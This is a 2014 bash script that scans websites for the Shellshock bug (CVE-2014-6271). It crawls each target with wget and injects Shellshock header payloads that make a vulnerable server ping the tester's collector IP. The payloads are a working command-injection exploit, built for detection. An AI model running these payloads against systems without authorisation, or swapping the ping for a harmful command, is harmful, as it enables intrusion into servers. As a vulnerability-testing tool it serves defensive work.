#!/bin/bash #----------------------------------------------------------------------- # Purpose: scan for CVE-2014-6271 (bash "shellshock" bug) # Created: 2014-09-25 # Author: Royce Williams # License: public domain #----------------------------------------------------------------------- # Your IP that will listen for responses. COLLECTOR_IP=127.0.0.1 # Your list of targets. TARGET_LIST="\ https://target.example.net/ \ " #----------------------------------------------------------------------- # Scan. [ ! -d /var/tmp/bashwalk ] && mkdir /var/tmp/bashwalk for target_site in ${TARGET_LIST}; do echo "Testing ${target_site} ..." # Generate a mostly-unique cookie based on the URL. TARGET_COOKIE=`echo $target_site | tr -c [:alnum:] \~` echo Using cookie: ${TARGET_COOKIE} # By using 'User-Agent', we show up in the target logs - useful for debugging. wget -e robots=off -r -l inf --force-html --spider --no-check-certificate \ -R 7z,avi,bin.bz2,csv,db,dbf,doc,docx,dmg,flv,gif,gz,img,iso,jpg,jpeg,m4a,m4v,mp3,mpg,pdf,png,ppt,pptx,rpm,rtf,swf,tar,tgz,ttf,txt,vob,wav,wma,wmv,xls,xlsx,zip \ --header "User-Agent:() {:; }; bashwalk to ${COLLECTOR_IP}" \ --header "X-Custom-0:() {:; }; /usr/bin/ping ${COLLECTOR_IP}" \ --header "X-Custom-1:() {:; }; /bin/ping ${COLLECTOR_IP}" \ --header "X-Custom-2:() {:; }; /sbin/ping ${COLLECTOR_IP}" \ --header "X-Custom-3:() {:; }; /usr/sbin/ping ${COLLECTOR_IP}" \ $target_site 2>&1 \ | tee /var/tmp/bashwalk/${TARGET_COOKIE} done #-----------------------------------------------------------------------